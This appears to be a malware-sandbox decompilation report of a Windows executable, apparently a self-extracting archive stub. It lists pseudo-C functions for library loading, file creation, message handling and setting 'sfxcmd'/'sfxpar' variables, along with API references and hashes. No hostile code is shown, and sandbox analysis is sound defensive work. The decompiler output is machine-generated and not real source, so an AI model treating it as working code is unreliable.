                                                    			E00CE3B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                    				WCHAR* _v8;
                                                    				signed int _t11;
                                                    				WCHAR* _t12;
                                                    				struct HINSTANCE__* _t13;
                                                    				struct HINSTANCE__* _t16;
                                                    				struct HINSTANCE__* _t18;
                                                    				signed int* _t22;
                                                    				signed int* _t26;
                                                    				struct HINSTANCE__* _t29;
                                                    				WCHAR* _t31;
                                                    				void* _t32;
                                                    
                                                    				_t26 = _a4;
                                                    				while(_t26 != _a8) {
                                                    					_t11 =  *_t26;
                                                    					_t22 = 0xd220e0 + _t11 * 4;
                                                    					_t29 =  *_t22;
                                                    					if(_t29 == 0) {
                                                    						_t12 =  *(0xcf62b4 + _t11 * 4);
                                                    						_v8 = _t12;
                                                    						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
                                                    						_t29 = _t13;
                                                    						if(_t29 != 0) {
                                                    							L13:
                                                    							 *_t22 = _t29;
                                                    							if( *_t22 != 0) {
                                                    								FreeLibrary(_t29);
                                                    							}
                                                    							L15:
                                                    							_t16 = _t29;
                                                    							L12:
                                                    							return _t16;
                                                    						}
                                                    						_t18 = GetLastError();
                                                    						if(_t18 != 0x57) {
                                                    							L8:
                                                    							 *_t22 = _t18 | 0xffffffff;
                                                    							L9:
                                                    							_t26 =  &(_t26[1]);
                                                    							continue;
                                                    						}
                                                    						_t31 = _v8;
                                                    						_t18 = E00CE6088(_t31, L"api-ms-", 7);
                                                    						_t32 = _t32 + 0xc;
                                                    						if(_t18 == 0) {
                                                    							goto L8;
                                                    						}
                                                    						_t18 = LoadLibraryExW(_t31, 0, 0);
                                                    						_t29 = _t18;
                                                    						if(_t29 != 0) {
                                                    							goto L13;
                                                    						}
                                                    						goto L8;
                                                    					}
                                                    					if(_t29 != 0xffffffff) {
                                                    						goto L15;
                                                    					}
                                                    					goto L9;
                                                    				}
                                                    				_t16 = 0;
                                                    				goto L12;
                                                    			}















                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00CE3C35,00000000,00000FA0,00D22088,00000000,?,00CE3D60,00000004,InitializeCriticalSectionEx,00CF6394,InitializeCriticalSectionEx,00000000), ref: 00CE3C03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-
                                                    • API String ID: 3664257935-2084034818
                                                    • Opcode ID: c8f5b90733b041a78d2b2a80cd3db84610ddc265065d44450aea105eb998f83f
                                                    • Instruction ID: 46a680e3441b0d8576348b3d588e429533b6d074818922ee032e357d82fbd051
                                                    • Opcode Fuzzy Hash: c8f5b90733b041a78d2b2a80cd3db84610ddc265065d44450aea105eb998f83f
                                                    • Instruction Fuzzy Hash: 3F11A731A452E5ABCB218B6A9C49B6E37649F01770F250211E926EB2D0D775FF00C6D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 994 cc98e0-cc9901 call cdec50 997 cc990c 994->997 998 cc9903-cc9906 994->998 1000 cc990e-cc991f 997->1000 998->997 999 cc9908-cc990a 998->999 999->1000 1001 cc9927-cc9931 1000->1001 1002 cc9921 1000->1002 1003 cc9936-cc9943 call cc6edb 1001->1003 1004 cc9933 1001->1004 1002->1001 1007 cc994b-cc996a CreateFileW 1003->1007 1008 cc9945 1003->1008 1004->1003 1009 cc996c-cc998e GetLastError call ccbb03 1007->1009 1010 cc99bb-cc99bf 1007->1010 1008->1007 1014 cc99c8-cc99cd 1009->1014 1016 cc9990-cc99b3 CreateFileW GetLastError 1009->1016 1012 cc99c3-cc99c6 1010->1012 1012->1014 1015 cc99d9-cc99de 1012->1015 1014->1015 1017 cc99cf 1014->1017 1018 cc99ff-cc9a10 1015->1018 1019 cc99e0-cc99e3 1015->1019 1016->1012 1020 cc99b5-cc99b9 1016->1020 1017->1015 1022 cc9a2e-cc9a39 1018->1022 1023 cc9a12-cc9a2a call cd0602 1018->1023 1019->1018 1021 cc99e5-cc99f9 SetFileTime 1019->1021 1020->1012 1021->1018 1023->1022
                                                    C-Code - Quality: 97%
                                                    			E00CC98E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
                                                    				struct _FILETIME _v0;
                                                    				char _t38;
                                                    				void* _t40;
                                                    				long _t52;
                                                    				unsigned int _t53;
                                                    				long _t56;
                                                    				signed int _t57;
                                                    				void* _t61;
                                                    				void* _t62;
                                                    				long _t68;
                                                    				void* _t70;
                                                    
                                                    				_t62 = __esi;
                                                    				E00CDEC50(0x1050);
                                                    				_t53 = _a4184;
                                                    				_t61 = __ecx;
                                                    				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
                                                    				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
                                                    					_t38 = 1;
                                                    				} else {
                                                    					_t38 = 0;
                                                    				}
                                                    				_push(_t62);
                                                    				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
                                                    				if((_t53 & 0x00000001) != 0) {
                                                    					_t68 = _t68 | 0x40000000;
                                                    				}
                                                    				_t56 =  !(_t53 >> 3) & 0x00000001;
                                                    				if(_t38 != 0) {
                                                    					_t56 = _t56 | 0x00000002;
                                                    				}
                                                    				E00CC6EDB( &_a8);
                                                    				if( *((char*)(_t61 + 0x24)) != 0) {
                                                    					_t68 = _t68 | 0x00000100;
                                                    				}
                                                    				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
                                                    				_t70 = _t40;
                                                    				if(_t70 != 0xffffffff) {
                                                    					goto L15;
                                                    				} else {
                                                    					_v0.dwLowDateTime = GetLastError();
                                                    					if(E00CCBB03(_a4180,  &_a8, 0x800) == 0) {
                                                    						L16:
                                                    						if(_v0.dwLowDateTime == 2) {
                                                    							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
                                                    						}
                                                    						L18:
                                                    						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
                                                    							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
                                                    							_a4 = _a4 | 0xffffffff;
                                                    							SetFileTime(_t70, 0,  &_v0, 0);
                                                    						}
                                                    						 *((char*)(_t61 + 0x1c)) = 0;
                                                    						 *((intOrPtr*)(_t61 + 0x10)) = 0;
                                                    						_t30 = _t70 != 0xffffffff;
                                                    						_t57 = _t56 & 0xffffff00 | _t30;
                                                    						 *((char*)(_t61 + 0x15)) = 0;
                                                    						if(_t30 != 0) {
                                                    							 *(_t61 + 8) = _t70;
                                                    							E00CD0602(_t61 + 0x32, _a4180, 0x800);
                                                    							 *((char*)(_t61 + 0x25)) = 0;
                                                    						}
                                                    						return _t57;
                                                    					}
                                                    					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
                                                    					_t52 = GetLastError();
                                                    					if(_t52 == 2) {
                                                    						_v0.dwLowDateTime = _t52;
                                                    					}
                                                    					L15:
                                                    					if(_t70 != 0xffffffff) {
                                                    						goto L18;
                                                    					}
                                                    					goto L16;
                                                    				}
                                                    			}















                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CC7760,?,00000005,?,00000011), ref: 00CC995F
                                                    • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC996C
                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CC7760,?,00000005,?), ref: 00CC99A2
                                                    • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99AA
                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast$Time
                                                    • String ID:
                                                    • API String ID: 1999340476-0
                                                    • Opcode ID: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                    • Instruction ID: ee3130689e0b5fdad901d7914275a5fd7f170291d3bc86b775d2090d0920129b
                                                    • Opcode Fuzzy Hash: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                    • Instruction Fuzzy Hash: 9E3121309447816FE7309F24CC4AFAABB94FB04320F200B1EF9B9961D0D7B4AA44CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1053 cdb568-cdb581 PeekMessageW 1054 cdb5bc-cdb5be 1053->1054 1055 cdb583-cdb597 GetMessageW 1053->1055 1056 cdb599-cdb5a6 IsDialogMessageW 1055->1056 1057 cdb5a8-cdb5b6 TranslateMessage DispatchMessageW 1055->1057 1056->1054 1056->1057 1057->1054
                                                    C-Code - Quality: 100%
                                                    			E00CDB568() {
                                                    				struct tagMSG _v32;
                                                    				int _t7;
                                                    				struct HWND__* _t10;
                                                    				long _t14;
                                                    
                                                    				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
                                                    				if(_t7 != 0) {
                                                    					GetMessageW( &_v32, 0, 0, 0);
                                                    					_t10 =  *0xd08458; // 0x10398
                                                    					if(_t10 == 0) {
                                                    						L3:
                                                    						TranslateMessage( &_v32);
                                                    						_t14 = DispatchMessageW( &_v32); // executed
                                                    						return _t14;
                                                    					}
                                                    					_t7 = IsDialogMessageW(_t10,  &_v32);
                                                    					if(_t7 == 0) {
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				return _t7;
                                                    			}








                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                    • IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                    • TranslateMessage.USER32(?), ref: 00CDB5AC
                                                    • DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 1266772231-0
                                                    • Opcode ID: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                    • Instruction ID: 8e9f454b720d2cbc9fec9177e16d73d356d9fc0f8cab845b38da9d1ad43bb21b
                                                    • Opcode Fuzzy Hash: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                    • Instruction Fuzzy Hash: 35F0BD71A0121AAB8B209FE5AD4CEEB7FACEE156917004415B519D2210EB38D606CBB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1058 cdabab-cdabca GetClassNameW 1059 cdabcc-cdabe1 call cd1fbb 1058->1059 1060 cdabf2-cdabf4 1058->1060 1065 cdabf1 1059->1065 1066 cdabe3-cdabef FindWindowExW 1059->1066 1062 cdabff-cdac01 1060->1062 1063 cdabf6-cdabf9 SHAutoComplete 1060->1063 1063->1062 1065->1060 1066->1065
                                                    C-Code - Quality: 100%
                                                    			E00CDABAB(long _a4) {
                                                    				short _v164;
                                                    				long _t5;
                                                    				long _t6;
                                                    				WCHAR* _t9;
                                                    				long _t11;
                                                    
                                                    				_t11 = _a4;
                                                    				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
                                                    				if(_t5 != 0) {
                                                    					_t9 = L"EDIT";
                                                    					_t5 = E00CD1FBB( &_v164, _t9);
                                                    					if(_t5 != 0) {
                                                    						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
                                                    						_t11 = _t5;
                                                    					}
                                                    				}
                                                    				if(_t11 != 0) {
                                                    					_t6 = SHAutoComplete(_t11, 0x10); // executed
                                                    					return _t6;
                                                    				}
                                                    				return _t5;
                                                    			}









                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00CDABC2
                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CDABF9
                                                      • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CDABE9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                    • Instruction ID: 4382d83a25ac211aae670a6f89fd2c60ad92ecf02db42293ebbe41e5f0f513b6
                                                    • Opcode Fuzzy Hash: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                    • Instruction Fuzzy Hash: D4F0823260132877DB305B649C09FAB76AC9B46B40F484013BB05E22C0D765DB4286BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 25%
                                                    			E00CDAC16(intOrPtr* __ecx) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				char _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				char _v32;
                                                    				intOrPtr _t10;
                                                    
                                                    				_t10 = E00CD081B(L"riched20.dll"); // executed
                                                    				 *__ecx = _t10;
                                                    				 *0xd23174(0); // executed
                                                    				_v16 = 8;
                                                    				_v12 = 0x7ff;
                                                    				 *0xd23034( &_v16);
                                                    				_v32 = 1;
                                                    				_v28 = 0;
                                                    				_v24 = 0;
                                                    				_v20 = 0;
                                                    				L00CDEB2C(); // executed
                                                    				 *0xd23090(0xd08438,  &_v8,  &_v32, 0); // executed
                                                    				return __ecx;
                                                    			}












                                                    APIs
                                                      • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                      • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    • OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                    • SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 3498096277-3360196438
                                                    • Opcode ID: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                    • Instruction ID: 7da2cd2f8d7291c42257a5a985dfd7a5bfb2157884af74b08e8ecdbf17264e48
                                                    • Opcode Fuzzy Hash: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                    • Instruction Fuzzy Hash: A4F0FFB1D00209ABCB20AFA9D9499AFFBFCEF94700F004157A555E2241DBB856069BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1071 cddbde-cddc12 call cdec50 SetEnvironmentVariableW call cd0371 1076 cddc14-cddc18 1071->1076 1077 cddc36-cddc38 1071->1077 1078 cddc21-cddc28 call cd048d 1076->1078 1081 cddc1a-cddc20 1078->1081 1082 cddc2a-cddc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                    C-Code - Quality: 65%
                                                    			E00CDDBDE(void* __eflags, WCHAR* _a4) {
                                                    				char _v8196;
                                                    				WCHAR* _t8;
                                                    				int _t11;
                                                    				WCHAR* _t13;
                                                    
                                                    				E00CDEC50(0x2000);
                                                    				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
                                                    				_t8 = E00CD0371(_a4,  &_v8196, 0x1000);
                                                    				_t13 = _t8;
                                                    				if(_t13 != 0) {
                                                    					_push( *_t13 & 0x0000ffff);
                                                    					while(E00CD048D() != 0) {
                                                    						_t13 =  &(_t13[1]);
                                                    						_push( *_t13 & 0x0000ffff);
                                                    					}
                                                    					_t11 = SetEnvironmentVariableW(L"sfxpar", _t13); // executed
                                                    					return _t11;
                                                    				}
                                                    				return _t8;
                                                    			}








                                                    APIs
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 1431749950-3493335439
                                                    • Opcode ID: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                    • Instruction ID: 9d80cf915c9a5441e0732f6dee2af9bf541682a27d0064f8b38db668d830626f
                                                    • Opcode Fuzzy Hash: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                    • Instruction Fuzzy Hash: 24F0EC7291422877CB202F958C06FFF7B58BF44781F044413FF8696255D6B09940D6B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1083 cc9785-cc9791 1084 cc979e-cc97b5 ReadFile 1083->1084 1085 cc9793-cc979b GetStdHandle 1083->1085 1086 cc97b7-cc97c0 call cc98bc 1084->1086 1087 cc9811 1084->1087 1085->1084 1091 cc97d9-cc97dd 1086->1091 1092 cc97c2-cc97ca 1086->1092 1089 cc9814-cc9817 1087->1089 1093 cc97ee-cc97f2 1091->1093 1094 cc97df-cc97e8 GetLastError 1091->1094 1092->1091 1095 cc97cc 1092->1095 1097 cc980c-cc980f 1093->1097 1098 cc97f4-cc97fc 1093->1098 1094->1093 1096 cc97ea-cc97ec 1094->1096 1099 cc97cd-cc97d7 call cc9785 1095->1099 1096->1089 1097->1089 1098->1097 1100 cc97fe-cc9807 GetLastError 1098->1100 1099->1089 1100->1097 1103 cc9809-cc980a 1100->1103 1103->1099
                                                    C-Code - Quality: 59%
                                                    			E00CC9785(void* __ecx, void* _a4, long _a8) {
                                                    				long _v8;
                                                    				int _t14;
                                                    				signed int _t15;
                                                    				void* _t25;
                                                    
                                                    				_push(__ecx);
                                                    				_t25 = __ecx;
                                                    				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
                                                    					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
                                                    				}
                                                    				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
                                                    				if(_t14 != 0) {
                                                    					_t15 = _v8;
                                                    				} else {
                                                    					_t16 = E00CC98BC(_t25);
                                                    					if(_t16 == 0) {
                                                    						L7:
                                                    						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
                                                    							L10:
                                                    							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
                                                    								L14:
                                                    								_t15 = _t16 | 0xffffffff;
                                                    							} else {
                                                    								_t16 = GetLastError();
                                                    								if(_t16 != 0x21) {
                                                    									goto L14;
                                                    								} else {
                                                    									_push(0x8000);
                                                    									goto L6;
                                                    								}
                                                    							}
                                                    						} else {
                                                    							_t16 = GetLastError();
                                                    							if(_t16 != 0x6d) {
                                                    								goto L10;
                                                    							} else {
                                                    								_t15 = 0;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t16 = 0x4e20;
                                                    						if(_a8 <= 0x4e20) {
                                                    							goto L7;
                                                    						} else {
                                                    							_push(0x4e20);
                                                    							L6:
                                                    							_push(_a4);
                                                    							_t15 = E00CC9785(_t25);
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t15;
                                                    			}








                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CC9795
                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CC97AD
                                                    • GetLastError.KERNEL32 ref: 00CC97DF
                                                    • GetLastError.KERNEL32 ref: 00CC97FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                    • Instruction ID: 48957f2716f86bd32fb15a278d8bb7808ebd1a2c46edab073a59170e8fca7e2c
                                                    • Opcode Fuzzy Hash: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                    • Instruction Fuzzy Hash: 2B113C31914614EBDF205F65C808F6D37B9FB42361F10892EE426C61D0DB749F44DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 95%
                                                    			E00CEAD34(signed int _a4) {
                                                    				signed int _t9;
                                                    				void* _t10;
                                                    				void* _t13;
                                                    				signed int _t15;
                                                    				WCHAR* _t22;
                                                    				signed int _t24;
                                                    				signed int* _t25;
                                                    				void* _t27;
                                                    
                                                    				_t9 = _a4;
                                                    				_t25 = 0xd225d8 + _t9 * 4;
                                                    				_t24 =  *_t25;
                                                    				if(_t24 == 0) {
                                                    					_t22 =  *(0xcf73f0 + _t9 * 4);
                                                    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
                                                    					_t27 = _t10;
                                                    					if(_t27 != 0) {
                                                    						L8:
                                                    						 *_t25 = _t27;
                                                    						if( *_t25 != 0) {
                                                    							FreeLibrary(_t27);
                                                    						}
                                                    						_t13 = _t27;
                                                    						L11:
                                                    						return _t13;
                                                    					}
                                                    					_t15 = GetLastError();
                                                    					if(_t15 != 0x57) {
                                                    						_t27 = 0;
                                                    					} else {
                                                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                    						_t27 = _t15;
                                                    					}
                                                    					if(_t27 != 0) {
                                                    						goto L8;
                                                    					} else {
                                                    						 *_t25 = _t15 | 0xffffffff;
                                                    						_t13 = 0;
                                                    						goto L11;
                                                    					}
                                                    				}
                                                    				_t4 = _t24 + 1; // 0x349e4b75
                                                    				asm("sbb eax, eax");
                                                    				return  ~_t4 & _t24;
                                                    			}












                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00CE40EF,00000000,00000000,?,00CEACDB,00CE40EF,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue), ref: 00CEAD66
                                                    • GetLastError.KERNEL32(?,00CEACDB,00CE40EF,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000,00000364,?,00CE98B7), ref: 00CEAD72
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CEACDB,00CE40EF,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000), ref: 00CEAD80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
